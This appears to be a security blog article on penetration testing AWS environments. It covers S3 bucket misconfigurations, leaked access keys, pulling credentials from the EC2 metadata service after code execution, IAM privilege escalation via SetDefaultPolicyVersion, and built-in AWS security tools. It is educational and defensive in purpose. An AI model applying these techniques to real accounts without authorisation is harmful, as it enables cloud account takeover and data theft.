Same Same, but Different
When penetration testing Amazon Web Services (AWS) environments there are different perspectives the assessment could consider, some are very similar to external infrastructure/web application assessments and some are different.
I’ll separate the things that are the same from the things that are different to traditional penetration testing by considering the following types of cloud testing and then breaking each one down into the kinds of testing that could take place:
- Testing on the Cloud: testing traditional system which are simply hosted within a cloud environment. For example, this can be virtualised systems that have been moved from on-premises to the cloud (e.g. “lift and shift”) or it could be web applications which are hosted on the cloud where only the applications themselves are considered in scope for the assessment and not the supporting infrastructure.
- Testing in the Cloud: testing systems within the cloud that are not exposed publicly, this for example could be testing the server hosting an application or for example, testing systems which are hosted on the cloud but have a firewall preventing direct access and are instead accessed through a bastion host (e.g. a private VPC). Additionally we would consider the risks associated with a compromised application that allows an attacker access to the backend infrastructure.
- Testing the Cloud Console: testing the configuration of the cloud console (sometimes referred to as the portal) itself, such as looking at the user accounts which have been set up, their permissions, the access-control lists which have been configured, etc. This is effectively a configuration review and could well be compliance driven – however there are still several things in this category to consider as a penetration tester in case access to a cloud console is gained during a penetration test. It’s also most likely an efficient way to determine potential paths of privilege escalation.
I’ll finish up with a little glossary of AWS security features which will act as a little introduction to the vast world of AWS terminology and point out a few built-in features that’s it’s definitely worth you being aware they exist.
Don’t forget that you’ll need permission from Amazon as well as the company who own the application to perform testing activity. Penetration Testing of Amazon hosted services has obviously been conducted before, therefore Amazon have a well-documented process for informing them when testing activity is going to take place, which systems you are authorised to perform penetration testing against, and appropriate terms of service and rules of engagement. More information here: https://aws.amazon.com/security/penetration-testing/
AWS only supports penetration testing of a small number of its services, such as EC2, RDS, CloudFront, Lamba, &c. However, that doesn’t mean that security testing can’t be conducted against other systems, it just means that active penetration testing and vulnerability testing type activity cannot be conducted. Which would limit you to console configuration review. Terms and conditions apply; I’m not a lawyer; read the small print; batteries not included.
Testing on the Cloud
Testing systems and applications that are simply lifted-and-shifted to the cloud are likely to be no different to testing an application that was hosted on-premises. The differences are going to start coming in when the maturity of the cloud installation increases to the point that AWS specific functionality is incorporated, such as S3 buckets.
S3 Bucket Troubles
S3 stands for Simple Storage Service. It’s designed as a web service to store and retrieve any amount of data from anywhere on the web. In short, highly scalable, reliable, fast, inexpensive data storage. By default, access to them is fairly restricted, but there’s a few ways that it can get a little messed up and potentially allow an attacker to access or store arbitrary data in your bucket.
S3 Buckets are within a global namespace, so they must be uniquely named. S3 buckets can be used for arbitrary data storage but many people use them for hosting websites and web content. Being able to enumerate an S3 bucket is just a fact of how they work, but being able to list their contents, view all contents, and write to them are configurable options.
So the issues around S3 are effectively:
- Listable buckets
- World-readable buckets
- World-writeable buckets.
Access to S3 buckets can be controlled in several ways: IAM policies, S3 bucket policies and S3 ACLs. S3 ACLs are legacy. There’s Amazon documentation about their protection here: https://aws.amazon.com/blogs/security/iam-policies-and-bucket-policies-and-acls-oh-my-controlling-access-to-s3-resources/.
A world-readable S3 bucket could be accessible like:
aws s3 ls s3://bucket.name
If you’ve not used the awscli before you can set it up by creating a free tier account on AWS (https://aws.amazon.com/s/dm/optimization/server-side-test/free-tier/free_np/) and then setting up a user account under IAM (Identity and Access Management) which is here: https://console.aws.amazon.com/iam/home#/home
If you set up a user account under users (https://console.aws.amazon.com/iam/home#/users) then you can view or create an accessKey and secretKey here: https://console.aws.amazon.com/iam/home#/users/USERNAME?section=security_credentials
sudo easy_install awscli aws configure AWS Access Key ID [None]: Your-AWS-AccessKey AWS Secret Access Key [None]: Your-AWS-SecretKey Default region name [None]: us-west-2 Default output format [None]:
“World-readable S3” bucket could actually refer to two issues, the first is an S3 bucket with read permissions granted to “Everyone” which in fact means everyone on the internet, not everyone within your organization. Also, granting read permission to “All AWS Users” means everyone with an AWS account, not everyone within your users list.
Finally, you can’t restrict users to listing specific buckets. They can either list them all or they can’t. Keys that can list one bucket can list all the buckets for that account. So make sure their names don’t contain anything confidential. It’s also possible for an anonymous user to remotely enumerate that a bucket exists by guessing its name. Not the biggest vulnerability to be aware of but worth noting that it exists.
If you want to see practical examples of this kind of issue then check out flaws.cloud!
There are examples of this happening in the wild too:
Losing Your Keys
Access to AWS services is done by keys (accessKey and SecretKey). Permissions are highly granular. Of course the permissions you get to AWS differs based on the keys that you use, as you’d expect. One vulnerability to consider is losing your keys. If AWS Keys (accessKey and secretKey) are every disclosed then bad things can occur – an attacker would obviously gain all of the privileges that those keys offer.
So I’ll run through a few ways in which AWS keys can be compromised, some are fairly obvious and some use cool AWS specific functionality. Starting at the beginning…
Accidentally committing them
If you work with a versioning system like GIT there is the potential that keys will be committed to the repository and it’s not quite as simple as just uncommitting them, or overwriting them with another commit. I won’t go over how to remove keys from a commit because my recommendation would be: If you have disclosed keys by mistake, revoke them and issue new keys. If keys were disclosed to a party which is now deemed not-trust worthy, revoke them and issue new keys. If you wrote them down on a post-it note, revoke them and issue new keys.
Might seem like a stretch to some of you? It happens:
Extracting keys from an EC2 instance
EC2 is an elastic computing service as part of AWS which is similar in nature to virtual private servers. Whilst an attacker is unlikely to have raw access (e.g. console access) to an EC2 instance there is the possibility that an attacker could steal console access and then use that access to steal the AWS keys. Most organisations would realise that if an instance (or vps) is compromised to this level a significant impact has been caused by the attacker and would likely perform some action like flattening the instance and rebuilding it to prevent backdoors, etc, for being used – however you should also consider that the keys may have been compromised.
This could work, for example, in the case of a web application where a remote code execution vulnerability has been caused by a vulnerability. The attacker could access the Meta Service of AWS to pull the keys. The Instance Metadata Service has documentation here: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html
In short, the attacker, from the compromised instance, could access:
which would return the role and:
would return the keys. More information is available here: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/iam-roles-for-amazon-ec2.html#instance-metadata-security-credentials
Yep, that happens too:
Testing in the Cloud
By “testing on the cloud” I mean effectively having the perspective of a system running within an Amazon Virtual Private Cloud (VPC) or equivalent. Something similar to if a Penetration Tester were to walk in to an office and plug a laptop in to an available network port and start scanning machines, or if an attacker were to compromise a client device with a phishing attack and start trying to pivot into the corporate network. In the context of a cloud environment the attack could potentially be if a cloud server, or EC2 instance, was compromised by an attacker – how they would attempt to attack additional machines within the VPC.
As with security testing any network environment there are a few different approaches. One of the simplest approaches would be to perform vulnerability scanning within the VPC, which could be achieved by deploying a vulnerability scanning appliance, these can be acquired through Amazon Machine Images (AMI), for which there are scanners available from Tenable (Nessus) and Qualys, for example.
Alternatively a Penetration Tester could be given secure access to an instance within the VPC, or interconnected to the VPC, to allow them network access for their testing. Another approach would be to set up a VPN tunnel to the AWS environment to allow penetration testing activity within the environment more directly. The number of instances, complexity of the environment, and desired level of assurance will likely dictate which is the best approach.
Testing the Cloud Console
Finally, by testing the cloud itself, I am referring to connecting to the AWS Console to take a look at the security of the configuration of the console. Really this is configuration review type activities but it’s worth taking a brief look at here, as an attacker could potentially compromise an account with access and it gives an introduction to look at a few of the vulnerabilities that exist and the security features amazon has provided.
The first thing to say, in regards to an attacker compromising an account with access to the AWS Console is that accounts can be configured to require multifactor authentication (MFA; sometimes referred to as two-factor authentication or 2FA). There are quite a number of MFA options for AWS, it can also be used for controlling access to the console and access to AWS APIs. More details are available here: https://aws.amazon.com/iam/details/mfa/
AWS allows granular configuration of Identity and Access Management (IAM). You can restrict the permissions a user has to quite a fine degree, however there are certain permissions which potentially allow a greater level of access than you might realise.
There are a couple of detailed write ups and tools available, so I’d recommend reviewing those too if this is a concern to you:
Rhino Security Labs’ Write up: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
In short, there are many permissions sets which given certain restrictions can allow for privilege escalation within AWS environments, CyberArk gives 10 examples of these and RhinoLabs added a few more.
A simple example you may come across would be where a user may modify the policy version which applies to their account by means of having the iam:SetDefaultPolicyVersion permission.
If you consider the situation where an administrator is setting up an account and then once everything is working hardening that account, it would not be a stretch to expect the administrator to give more permissions than are necessary initially and then tune the permissions of that account down to follow the principle of lease privilege. If a policy the attacker has access to has a higher level of permissions but they have access to set the default policy version they can simply chance which version is in use. This kind of issue is obviously highly contextual to the specific set up your environment has and RhinoLabs gives 17 such possible privilege escalation methods – so it’s certainly worth reviewing them!
Finally, there are tools to help audit the configuration of your AWS Console, such as Scout2: https://github.com/nccgroup/Scout2
AWS Security Features
AWS has many security features, and I find it interesting when I talk to people who use AWS who aren’t aware of the various monitoring and security features that are built it. There are alternatives to them all of course, and they’re not all free – but it’s worth at least checking the basics out to see what your options are! So here’s some examples/
AWS Inspector – https://aws.amazon.com/inspector/ – is an automated security assessment service for application deployed within AWS. If you’d like to try it out there is a 90 day trial of up to 250 agent-assessments. IT finds issues such as insecure protocols, software running without DEP, software without stack cookies, root processes – but it requires an agent to be installed to use.
AWS CloudWatch – https://aws.amazon.com/cloudwatch/ – is a system monitoring service. It has basic or detailed monitoring, of which the latter has a fee. It keeps an eye on systems and watches metrics such as read/write latency of EBS, storage availability within RDS, CPU utilisation of EC2 instances.
AWS CloudTrail – https://aws.amazon.com/cloudtrail/ – is a system that allows you to log what’s happening within your AWS environment, including actions taken within the console, command line tools, and services. It’s useful not only for security purposes but also things such as monitoring changes to your resource utilisation over time, for example.
AWS Athena – https://aws.amazon.com/athena/ – is a service which allows you to query data stored within S3 buckets using SQL. So it’s great to pair up with CloudTrail to effectively search your log dumps in a more effective, or complex, way that what CloudTrail offers itself.
AWS TrustedAdvisor – https://aws.amazon.com/premiumsupport/trustedadvisor/ – is a system which gives recommendations in several categories, but of course it’s tiered so there’s “core” and “full” depending on if you’re on a standard, business, or enterprise plan (the latter two get “full” access). It gives recommendations on how to improve your environment in categories such as: security, cost optimisation, performance, and fault tolerance. Nicely they actually expose all of the checks each level and category provide (https://aws.amazon.com/premiumsupport/trustedadvisor/best-practices/), so for example under security we have things such as: security groups with unrestricted access, unrestricted access to systems to specific network ports, missing MFA on the root account, IAM password policy, etc.
AWS Artifact – https://aws.amazon.com/artifact/ – gives access to compliance reports for requirements such as ISO 9001, ISO27001, PCI DSS, and more.
AWS Shield – https://aws.amazon.com/shield/ – is managed DDOS protection, which provides always on protection for DDOS attacks by monitoring for them and then automatically placing in-line mitigations on systems. There is also AWS Shield Advanced for higher levels of protection. One thing to take a look at definitely is the “Cost Protection” which returns service credits for scaling charges due to DDOS attacks.